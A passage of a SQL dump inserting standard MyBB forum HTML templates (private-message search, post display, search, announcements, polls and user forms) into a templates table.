class=\"smalltext\"><strong>{$lang->message_title}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"30%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$sender}</strong></span></td>\n<td class=\"tcat\" align=\"right\" width=\"20%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->date_sent}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"1%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><input name=\"allbox\" title=\"{$lang->check_all}\" type=\"checkbox\" class=\"checkbox checkall\" value=\"{$lang->check_all}\" /></span></td>\n</tr>\n{$messagelist}\n<tr>\n<td class=\"tfoot\" align=\"right\" colspan=\"6\">\n<input type=\"submit\" class=\"button\" name=\"moveto\" value=\"{$lang->move_to}\" /> {$folderoplist} {$lang->or}\n<input type=\"submit\" class=\"button\" name=\"delete\" value=\"{$lang->delete}\" /> {$lang->selected_messages}\n</td>\n</tr>\n</table>\n<br />\n<div class=\"float_left\">{$multipage}</div>\n<div class=\"float_right\">\n<span class=\"smalltext\">\n<strong>{$lang->jump_folder} {$folderjump}\n<input type=\"submit\" class=\"button\" name=\"hop\" value=\"{$lang->go}\" />\n</strong>\n</span>\n</div>\n</td>\n</tr>\n</table>\n<input type=\"hidden\" name=\"action\" value=\"do_stuff\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('189', 'private_search_results', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->private_messaging}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"private.php\" method=\"post\" name=\"pmForm\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"7\">\n <div class=\"float_right\">\n <input type=\"text\" name=\"keywords\" value=\"{$lang->enter_keywords}\" onfocus=\"if(this.value == \'{$lang->enter_keywords}\') { this.value = \'\'; }\" onblur=\"if(this.value==\'\') { this.value=\'{$lang->enter_keywords}\'; }\" class=\"textbox\" size=\"25\" />\n <input type=\"submit\" class=\"button\" name=\"quick_search\" value=\"{$lang->search_pms}\" />\n (<a href=\"private.php?action=advanced_search\">{$lang->advanced_search}</a>)</div>\n <strong>{$lang->pm_search_results}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" align=\"left\" colspan=\"3\"><span class=\"smalltext\"><strong>{$lang->message}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"10%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->sender}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"10%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->folder}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"10%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><strong>{$lang->date_sent}</strong></span></td>\n<td class=\"tcat\" align=\"center\" width=\"1%\" style=\"white-space: nowrap\"><span class=\"smalltext\"><input name=\"allbox\" title=\"{$lang->check_all}\" type=\"checkbox\" class=\"checkbox checkall\" value=\"{$lang->check_all}\" /></span></td>\n</tr>\n{$messagelist}\n<tr>\n<td class=\"tfoot\" align=\"right\" colspan=\"7\">\n<input type=\"submit\" class=\"button\" name=\"moveto\" value=\"{$lang->move_to}\" /> {$folderoplist} {$lang->or}\n<input type=\"submit\" class=\"button\" name=\"delete\" value=\"{$lang->delete}\" /> {$lang->selected_messages}\n</td>\n</tr>\n</table>\n<br />\n<div class=\"float_left\">{$multipage}</div>\n<div class=\"float_right\">\n<span class=\"smalltext\">\n<strong>{$lang->jump_folder} {$folderjump}\n<input type=\"submit\" class=\"button\" name=\"hop\" value=\"{$lang->go}\" />\n</strong>\n</span>\n</div>\n</td>\n</tr>\n</table>\n<input type=\"hidden\" name=\"action\" value=\"do_stuff\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('190', 'private_advanced_search', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->advanced_private_message_search}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"private.php\" method=\"post\" name=\"pmForm\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"do_search\" />\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"1\" cellpadding=\"4\" class=\"tborder\">\n <tr>\n <td class=\"thead\" colspan=\"2\"><strong>{$lang->advanced_private_message_search}</strong></td>\n </tr>\n <tr>\n <td class=\"tcat\" colspan=\"2\"><strong>{$lang->search_criteria}</strong></td>\n </tr>\n <tr>\n <td class=\"trow1\" width=\"20%\"><strong><label for=\"keywords\">{$lang->keywords}</label></strong></td>\n <td class=\"trow1\">\n <input type=\"text\" class=\"textbox\" name=\"keywords\" id=\"keywords\" size=\"35\" maxlength=\"250\" />\n <br />\n <span class=\"smalltext\">\n <label><input type=\"checkbox\" name=\"subject\" checked=\"checked\" value=\"1\" /> {$lang->search_in_subject}</label><br />\n <label><input type=\"checkbox\" name=\"message\" checked=\"checked\" value=\"1\" /> {$lang->search_in_message}</label>\n </span>\n </td>\n </tr>\n <tr>\n <td class=\"trow2\"><strong><label for=\"keywords\">{$lang->sender}</label></strong></td>\n <td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"sender\" id=\"sender\" size=\"35\" maxlength=\"250\" /></td>\n </tr>\n <tr>\n <td class=\"trow1\"><strong>{$lang->message_status}</strong></td>\n <td class=\"trow1 smalltext\">\n <label><input type=\"checkbox\" name=\"status[new]\" checked=\"checked\" value=\"1\" /> {$lang->message_status_new}</label><br />\n <label><input type=\"checkbox\" name=\"status[replied]\" checked=\"checked\" value=\"1\" /> {$lang->message_status_replied_to}</label><br />\n <label><input type=\"checkbox\" name=\"status[forwarded]\" checked=\"checked\" value=\"1\" /> {$lang->message_status_forwarded}</label><br />\n <label><input type=\"checkbox\" name=\"status[read]\" checked=\"checked\" value=\"1\" /> {$lang->message_status_read}</label>\n </td>\n </tr>\n <tr>\n <td class=\"trow2\"><strong><label for=\"folder\">{$lang->folder}</label></strong>\n </td>\n <td class=\"trow2\">\n {$foldersearch}\n </td>\n </tr>\n <tr>\n <td class=\"tcat\" colspan=\"2\"><strong>{$lang->search_options}</strong></td>\n </tr>\n <tr>\n <td class=\"trow1\" width=\"20%\"><strong><label for=\"sort\">{$lang->sort_by}</label></strong></td>\n \n <td class=\"trow1\">\n <select name=\"sort\" id=\"sort\">\n <option value=\"subject\">{$lang->sort_by_subject}</option>\n <option value=\"sender\">{$lang->sort_by_sender}</option>\n <option value=\"dateline\" selected=\"selected\">{$lang->sort_by_date}</option>\n </select><br />\n <span class=\"smalltext\">\n <input type=\"radio\" class=\"radio\" name=\"order\" id=\"order_asc\" value=\"asc\" /> <label for=\"order_asc\">{$lang->ascending_order}</label><br />\n <input type=\"radio\" class=\"radio\" name=\"order\" id=\"order_desc\" checked=\"checked\" value=\"desc\" /> <label for=\"order_desc\">{$lang->descending_order}</label>\n </span>\n </td>\n </tr>\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" value=\"{$lang->search_private_messages}\" /></div>\n</td>\n</tr>\n</table>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('191', 'private_pmspace', '<span style=\"float:right\"><table cellspacing=\"0\" cellpadding=\"0\" width=\"230\" style=\"border: solid 1px #000000;\">\n <tr>\n <td width=\"{$spaceused}\" bgcolor=\"red\" align=\"center\"><span class=\"smalltext\"><strong>{$overhalf}</strong></span></td>\n <td width=\"{$spaceused2}\" bgcolor=\"green\" align=\"center\"><span class=\"smalltext\"><strong>{$belowhalf}</strong></span></td>\n <td width=\"130\" align=\"center\"><span class=\"smalltext\"><strong>{$lang->pmspaceused}</strong></span></td>\n </tr>\n</table></span>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('192', 'forumdisplay_announcements_announcement', '<tr>\n<td align=\"center\" class=\"{$bgcolor}\" width=\"2%\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" alt=\"\"/></td>\n<td align=\"center\" class=\"{$bgcolor}\" width=\"2%\">&nbsp;</td>\n<td class=\"{$bgcolor}\">\n <a href=\"{$announcement[\'announcementlink\']}\"{$new_class}>{$announcement[\'subject\']}</a>\n <div class=\"author smalltext\">{$announcement[\'profilelink\']}</div>\n</td>\n<td align=\"center\" class=\"{$bgcolor}\">-</td>\n<td align=\"center\" class=\"{$bgcolor}\">-</td>\n{$rating}\n<td class=\"{$bgcolor}\" style=\"white-space: nowrap; text-align: right\"><span class=\"smalltext\">{$postdate} {$posttime}</span></td>\n{$modann}\n</tr>\n', '-2', '1408', '', '1339729416'); INSERT INTO mybb_templates VALUES('193', 'forumdisplay_announcements', '<tr>\n<td class=\"trow_sep\" colspan=\"{$colspan}\">{$lang->forum_announcements}</td>\n</tr>\n{$announcements}', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('194', 'forumdisplay_sticky_sep', '<tr>\n<td class=\"trow_sep\" colspan=\"{$colspan}\">{$lang->sticky_threads}</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('195', 'forumdisplay_threads_sep', '<tr>\n<td class=\"trow_sep\" colspan=\"{$colspan}\">{$lang->normal_threads}</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('196', 'postbit', '{$ignore_bit}\n<a name=\"pid{$post[\'pid\']}\" id=\"pid{$post[\'pid\']}\"></a>\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"{$post_extra_style} {$post_visibility}\" id=\"post_{$post[\'pid\']}\">\n <tbody>\n <tr>\n <td class=\"tcat\">\n <div class=\"float_left smalltext\">\n {$post[\'postdate\']}, {$post[\'posttime\']} <span id=\"edited_by_{$post[\'pid\']}\">{$post[\'editedmsg\']}</span>\n </div>\n {$post[\'posturl\']}\n </td>\n </tr>\n\n <tr>\n <td class=\"trow1 {$unapproved_shade}\">\n <table cellspacing=\"0\" cellpadding=\"0\" border=\"0\" style=\"width: 100%;\">\n <tr>\n <td class=\"post_avatar\" width=\"1\" style=\"{$post[\'avatar_padding\']}\">\n {$post[\'useravatar\']}\n </td>\n <td class=\"post_author\">\n <strong><span class=\"largetext\">{$post[\'profilelink\']}</span></strong> {$post[\'onlinestatus\']}<br />\n <span class=\"smalltext\">\n {$post[\'usertitle\']}<br />\n {$post[\'userstars\']}\n {$post[\'groupimage\']}\n </span>\n </td>\n <td class=\"smalltext post_author_info\" width=\"165\">\n {$post[\'user_details\']}\n </td>\n </tr>\n </table>\n </td>\n </tr>\n\n <tr>\n <td class=\"trow2 post_content {$unapproved_shade}\">\n <span class=\"smalltext\"><strong>{$post[\'icon\']}{$post[\'subject\']} {$post[\'subject_extra\']}</strong></span>\n\n <div class=\"post_body\" id=\"pid_{$post[\'pid\']}\">\n {$post[\'message\']}\n </div>\n {$post[\'attachments\']}\n {$post[\'signature\']}\n\n <div class=\"post_meta\" id=\"post_meta_{$post[\'pid\']}\">\n {$post[\'iplogged\']}\n </div>\n </td>\n </tr>\n\n <tr>\n <td class=\"trow1 post_buttons {$unapproved_shade}\">\n <div class=\"author_buttons float_left\">\n {$post[\'button_email\']}{$post[\'button_pm\']}{$post[\'button_www\']}{$post[\'button_find\']}{$post[\'button_rep\']}\n </div>\n <div class=\"post_management_buttons float_right\">{$post[\'button_edit\']}{$post[\'button_quickdelete\']}{$post[\'button_quote\']}{$post[\'button_multiquote\']}{$post[\'button_report\']}{$post[\'button_warn\']}{$post[\'button_reply_pm\']}{$post[\'button_replyall_pm\']}{$post[\'button_forward_pm\']}{$post[\'button_delete_pm\']}\n </div>\n </td>\n </tr>\n </tbody>\n</table>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('197', 'postbit_classic', '{$ignore_bit}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"{$post_extra_style} {$post_visibility}\" id=\"post_{$post[\'pid\']}\">\n <tr>\n <td class=\"{$altbg}\" width=\"15%\" valign=\"top\" style=\"white-space: nowrap; text-align: center;\"><a name=\"pid{$post[\'pid\']}\" id=\"pid{$post[\'pid\']}\"></a>\n <strong><span class=\"largetext\">{$post[\'profilelink\']}</span></strong> {$post[\'onlinestatus\']}<br />\n <span class=\"smalltext\">\n {$post[\'usertitle\']}<br />\n {$post[\'userstars\']}\n {$post[\'groupimage\']}\n {$post[\'useravatar\']}<br />\n {$post[\'user_details\']}\n </span>\n </td>\n <td class=\"{$altbg}\" valign=\"top\">\n <table width=\"100%\">\n <tr><td>{$post[\'posturl\']}<span class=\"smalltext\"><strong>{$post[\'icon\']}{$post[\'subject\']} {$post[\'subject_extra\']}</strong></span>\n <br />\n <div id=\"pid_{$post[\'pid\']}\" class=\"post_body\">\n {$post[\'message\']}\n </div>\n {$post[\'attachments\']}\n {$post[\'signature\']}\n <div style=\"text-align: right; vertical-align: bottom;\" id=\"post_meta_{$post[\'pid\']}\">\n <div id=\"edited_by_{$post[\'pid\']}\">{$post[\'editedmsg\']}</div>\n {$post[\'iplogged\']}\n </div>\n </td></tr>\n </table>\n</td>\n</tr>\n<tr>\n <td class=\"{$altbg}\" style=\"white-space: nowrap; text-align: center; vertical-align: middle;\"><span class=\"smalltext\">{$post[\'postdate\']} {$post[\'posttime\']}</span></td>\n <td class=\"{$altbg}\" style=\"vertical-align: middle;\">\n <table width=\"100%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n <tr valign=\"bottom\">\n <td align=\"left\" ><span class=\"smalltext\">{$post[\'button_email\']}{$post[\'button_pm\']}{$post[\'button_www\']}{$post[\'button_find\']}{$post[\'button_rep\']}</span></td>\n <td align=\"right\">{$post[\'button_edit\']}{$post[\'button_quickdelete\']}{$post[\'button_quote\']}{$post[\'button_multiquote\']}{$post[\'button_report\']}{$post[\'button_warn\']}{$post[\'button_reply_pm\']}{$post[\'button_replyall_pm\']}{$post[\'button_forward_pm\']}{$post[\'button_delete_pm\']}</td>\n </tr>\n </table>\n </td>\n</tr>\n</table>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('198', 'postbit_gotopost', '<a href=\"{$url}\" class=\"quick_jump\">&nbsp;</a>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('199', 'forumdisplay_threadlist_clearpass', ' | <a href=\"misc.php?action=clearpass&amp;fid={$fid}&amp;my_post_key={$mybb->post_code}\">{$lang->clear_stored_password}</a>', '-2', '1606', '', '1339729416'); INSERT INTO mybb_templates VALUES('200', 'portal_welcome_guesttext', '<span class=\"smalltext\">{$lang->guest_welcome_registration}</span><br />\n<br />\n<form method=\"post\" action=\"{$portal_url}\"><input type=\"hidden\" name=\"action\" value=\"do_login\" />\n{$username}<br />&nbsp;&nbsp;<input type=\"text\" class=\"textbox\" name=\"username\" value=\"\" /><br /><br />\n{$lang->password}<br />&nbsp;&nbsp;<input type=\"password\" class=\"textbox\" name=\"password\" value=\"\" /><br /><br />\n<label title=\"{$lang->remember_me_desc}\"><input type=\"checkbox\" class=\"checkbox\" name=\"remember\" value=\"yes\" /> {$lang->remember_me}</label><br /><br />\n<br /><input type=\"submit\" class=\"button\" name=\"loginsubmit\" value=\"{$lang->login}\" /></form>', '-2', '1607', '', '1339729416'); INSERT INTO mybb_templates VALUES('201', 'portal_latestthreads_thread', '<tr>\n<td class=\"{$altbg}\">\n<strong><a href=\"{$mybb->settings[\'bburl\']}/{$thread[\'threadlink\']}\">{$thread[\'subject\']}</a></strong>\n<span class=\"smalltext\"><br />\n<a href=\"{$thread[\'lastpostlink\']}\">{$lang->latest_threads_lastpost}</a> {$lastposterlink}<br />\n{$lastpostdate} {$lastposttime}<br />\n<strong>&raquo; </strong>{$lang->latest_threads_replies} {$thread[\'replies\']}<br />\n<strong>&raquo; </strong>{$lang->latest_threads_views} {$thread[\'views\']}\n</span>\n</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('202', 'search', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->search}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form method=\"post\" action=\"search.php\">\n<input type=\"hidden\" name=\"action\" value=\"do_search\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td colspan=\"2\" class=\"thead\"><strong>{$mybb->settings[\'bbname\']} - {$lang->search}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" width=\"50%\"><strong>{$lang->search_keyword}</strong></td>\n<td class=\"tcat\" width=\"50%\"><strong>{$lang->search_username}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">\n<table><tr>\n<td valign=\"top\"><input type=\"text\" class=\"textbox\" name=\"keywords\" size=\"35\" maxlength=\"250\" /></td>\n</tr>\n<tr>\n<td>\n<span class=\"smalltext\"><input type=\"radio\" class=\"radio\" name=\"postthread\" value=\"1\" checked=\"checked\" />{$lang->search_entire_post}<br /><input type=\"radio\" class=\"radio\" name=\"postthread\" value=\"2\" />{$lang->search_titles_only}</span></td>\n</tr></table>\n</td>\n<td class=\"trow1\">\n<table><tr>\n<td class=\"trow1\"><input type=\"text\" class=\"textbox\" id=\"author\" name=\"author\" size=\"35\" maxlength=\"{$mybb->settings[\'maxnamelength\']}\" /><br /><span class=\"smalltext\"><input type=\"checkbox\" class=\"checkbox\" name=\"matchusername\" value=\"1\" checked=\"checked\" /> {$lang->match_username}</span></td>\n<td class=\"trow1\">&nbsp;</td>\n</tr></table>\n</td>\n</tr>\n<tr>\n<td class=\"tcat\"><strong>{$lang->search_forums}</strong></td>\n<td class=\"tcat\"><strong>{$lang->search_options}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" rowspan=\"{$rowspan}\">{$srchlist}</td>\n<td class=\"trow1\">\n<select name=\"findthreadst\">\n<option value=\"1\">{$lang->threads_at_least}</option>\n<option value=\"2\">{$lang->threads_at_most}</option>\n</select> <input type=\"text\" class=\"textbox\" name=\"numreplies\" size=\"2\" maxlength=\"4\" />&nbsp;{$lang->replies2}<br />\n<br />\n<select name=\"postdate\">\n<option value=\"0\">{$lang->find_anydate}</option>\n<option value=\"1\">{$lang->find_yesterday}</option>\n<option value=\"7\">{$lang->find_lastweek}</option>\n<option value=\"14\">{$lang->find_2weeks}</option>\n<option value=\"30\">{$lang->find_month}</option>\n<option value=\"90\">{$lang->find_3months}</option>\n<option value=\"180\">{$lang->find_6months}</option>\n<option value=\"365\">{$lang->find_year}</option>\n</select>&nbsp;&nbsp; <input type=\"radio\" class=\"radio\" name=\"pddir\" value=\"1\" checked=\"checked\" />{$lang->and_newer} <input type=\"radio\" class=\"radio\" name=\"pddir\" value=\"0\" />{$lang->and_older}<br />\n<br />\n{$prefixselect}\n</td>\n</tr>\n<tr>\n<td class=\"tcat\"><strong>{$lang->sorting_options}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">\n<select name=\"sortby\">\n<option value=\"lastpost\">{$lang->sort_lastpost}</option>\n<option value=\"starter\">{$lang->sort_author}</option>\n<option value=\"forum\">{$lang->sort_forum}</option>\n</select> {$lang->sort_in} <input type=\"radio\" class=\"radio\" name=\"sortordr\" value=\"asc\" />{$lang->sort_asc} <input type=\"radio\" class=\"radio\" name=\"sortordr\" value=\"desc\" checked=\"checked\" />{$lang->sort_desc} {$lang->sort_order}\n</td>\n</tr>\n<tr>\n<td class=\"tcat\"><strong>{$lang->display_options}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">{$lang->show_results_as} <input type=\"radio\" class=\"radio\" name=\"showresults\" value=\"threads\" checked=\"checked\" />{$lang->show_results_threads} <input type=\"radio\" class=\"radio\" name=\"showresults\" value=\"posts\" />{$lang->show_results_posts}</td>\n</tr>\n{$moderator_options}\n</table>\n<div align=\"center\"><br /><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->search}\" /></div>\n</form>\n{$footer}\n<script type=\"text/javascript\" src=\"jscripts/autocomplete.js?ver=1400\"></script>\n<script type=\"text/javascript\">\n<!--\n if(use_xmlhttprequest == \"1\")\n {\n new autoComplete(\"author\", \"xmlhttp.php?action=get_users\", {valueSpan: \"username\"});\n }\n// -->\n</script>\n</body>\n</html>\n', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('203', 'search_moderator_options', '<tr>\n<td class=\"tcat\"><strong>{$lang->mod_options}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" valign=\"top\">\n<select name=\"visible\">\n<option value=\"\">{$lang->find_all}</option>\n<option value=\"1\">{$lang->find_only_approved}</option>\n<option value=\"-1\">{$lang->find_only_unapproved}</option>\n</select> {$lang->results}\n</td>\n</tr>\n', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('204', 'postbit_groupimage', '<img src=\"{$usergroup[\'image\']}\" alt=\"{$usergroup[\'title\']}\" title=\"{$usergroup[\'title\']}\" />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('205', 'showthread_newreply', '<a href=\"newreply.php?tid={$tid}\"><img src=\"{$theme[\'imglangdir\']}/newreply.gif\" alt=\"{$lang->post_reply_img}\" title=\"{$lang->post_reply_img}\" /></a>&nbsp;', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('206', 'showthread_newthread', '<a href=\"newthread.php?fid={$fid}\"><img src=\"{$theme[\'imglangdir\']}/newthread.gif\" alt=\"{$lang->post_thread}\" title=\"{$lang->post_thread}\" /></a>&nbsp;', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('207', 'member_profile_groupimage', '<img src=\"{$displaygroup[\'image\']}\" alt=\"{$usertitle}\" title=\"{$usertitle}\" /><br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('208', 'misc_help_section', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both;\">\n<thead>\n<tr>\n<td class=\"thead\"><div class=\"expcolimage\"><img src=\"{$theme[\'imgdir\']}/{$expcolimage}\" id=\"sid_{$section[\'sid\']}_img\" class=\"expander\" alt=\"[-]\" title=\"[-]\" /></div><div><strong>{$section[\'name\']}</strong></div></td>\n</tr>\n</thead>\n<tbody style=\"{$expdisplay}\" id=\"sid_{$section[\'sid\']}_e\">\n<tr>\n<td class=\"tcat\"><span class=\"smalltext\"><strong>{$section[\'description\']}</strong></span></td>\n</tr>\n{$helpbits}\n</tbody>\n</table>\n<br />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('209', 'announcement', '<html>\n<head>\n<title>{$lang->announcements}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both; border-bottom-width: 0;\">\n<tr>\n<td class=\"thead\" colspan=\"3\"><strong>{$lang->forum_announcement}</strong></td>\n</tr>\n</table>\n{$announcement}\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('210', 'announcement_edit', '<a href=\"modcp.php?action=edit_announcement&amp;aid={$post[\'aid\']}&amp;fid={$fid}\"><img src=\"{$theme[\'imglangdir\']}/postbit_edit.gif\" alt=\"{$lang->announcement_edit}\" title=\"{$lang->announcement_edit}\" /></a>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('211', 'announcement_quickdelete', '<a href=\"modcp.php?action=delete_announcement&amp;aid={$post[\'aid\']}&amp;my_post_key={$mybb->post_code}\" onclick=\"if(confirm(&quot;{$lang->announcement_quickdelete_confirm}&quot;))window.location=this.href.replace(\'action=delete_announcement\',\'action=do_delete_announcement\');return false;\"><img src=\"{$theme[\'imglangdir\']}/postbit_delete.gif\" alt=\"{$lang->announcement_qdelete}\" title=\"{$lang->announcement_qdelete}\" /></a>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('212', 'member_emailuser', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->email_user}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n{$errors}\n<form action=\"member.php\" method=\"post\" name=\"input\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td colspan=\"2\" width=\"100%\" class=\"thead\"><strong>{$lang->email_user}</strong></td>\n</tr>\n<tr>\n<td width=\"40%\" class=\"trow2\"><strong>{$lang->email_subject}</strong></td>\n<td width=\"60%\" class=\"trow2\"><input type=\"text\" class=\"textbox\" size=\"50\" name=\"subject\" value=\"{$subject}\" /></td>\n</tr>\n<tr>\n<td valign=\"top\" width=\"40%\" class=\"trow1\"><strong>{$lang->email_message}</strong></td>\n<td width=\"60%\" class=\"trow1\"><textarea cols=\"50\" rows=\"10\" name=\"message\">{$message}</textarea></td>\n</tr>\n</table>\n<br />\n<input type=\"hidden\" name=\"action\" value=\"do_emailuser\" />\n<input type=\"hidden\" name=\"uid\" value=\"{$to_user[\'uid\']}\" />\n<div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->send_email}\" /></div>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('213', 'changeuserbox', '<tr>\n<td class=\"trow1\" width=\"20%\"><strong>{$lang->username}</strong></td>\n<td class=\"trow1\">{$mybb->user[\'username\']} <span class=\"smalltext\">[<strong><a href=\"member.php?action=logout&amp;logoutkey={$mybb->user[\'logoutkey\']}\">{$lang->change_user}</a></strong>]</span></td>\n</tr>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('214', 'showthread_poll_results', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"4\" align=\"center\"><strong>{$lang->poll} {$poll[\'question\']}</strong><br /><span class=\"smalltext\">{$pollstatus}</span></td>\n</tr>\n{$polloptions}\n<tr>\n<td class=\"tfoot\" align=\"right\" colspan=\"2\"><strong>{$lang->total}</strong></td>\n<td class=\"tfoot\" align=\"center\"><strong>{$lang->total_votes}</strong></td>\n<td class=\"tfoot\" align=\"center\"><strong>{$totpercent}</strong></td>\n</tr>\n</table>\n<table cellspacing=\"0\" cellpadding=\"2\" border=\"0\" width=\"100%\" align=\"center\">\n<tr>\n<td align=\"left\"><span class=\"smalltext\">{$lang->you_voted}</span></td>\n<td align=\"right\"><span class=\"smalltext\">[<a href=\"polls.php?action=showresults&amp;pid={$poll[\'pid\']}\">{$lang->show_results}</a>{$edit_poll}]</span></td>\n</tr>\n</table>\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('215', 'polls_showresults', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->poll_results}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"4\" align=\"center\"><strong>{$poll[\'question\']}</strong></td>\n</tr>\n{$polloptions}\n<tr>\n<td class=\"tfoot\" align=\"right\" colspan=\"2\"><strong>{$lang->poll_total}</strong></td>\n<td class=\"tfoot\" align=\"center\"><strong>{$poll[\'numvotes\']} {$lang->poll_votes}</strong></td>\n<td class=\"tfoot\" align=\"center\"><strong>{$totpercent}</strong></td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('216', 'member_register_password', '<tr>\n<td><span class=\"smalltext\">{$lang->password}</span></td>\n<td><span class=\"smalltext\">{$lang->confirm_password}</span></td>\n</tr>\n<tr>\n<td><input type=\"password\" class=\"textbox\" name=\"password\" id=\"password\" style=\"width: 100%\" /></td>\n<td><input type=\"password\" class=\"textbox\" name=\"password2\" id=\"password2\" style=\"width: 100%\" /></td>\n</tr>\n<tr>\n <td colspan=\"2\" style=\"display: none;\" id=\"password_status\">&nbsp;</td>\n</tr>\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('217', 'usercp_forumsubscriptions_forum', '<tr>\n<td class=\"trow1\" align=\"center\" valign=\"top\" width=\"1\"><img src=\"{$theme[\'imgdir\']}/{$folder}.gif\" valign=\"top\" /></td>\n<td class=\"trow1\" valign=\"top\">\n<strong><a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong><br /><span class=\"smalltext\"><a href=\"usercp2.php?action=removesubscription&amp;type=forum&amp;fid={$forum[\'fid\']}&amp;my_post_key={$mybb->post_code}\">{$lang->unsubscribe}</a> | <a href=\"newthread.php?fid={$forum[\'fid\']}\">{$lang->new_thread}</a></span></td>\n<td class=\"trow2\" valign=\"top\" style=\"white-space: nowrap; text-align: center;\">{$posts}</td>\n<td class=\"trow1\" 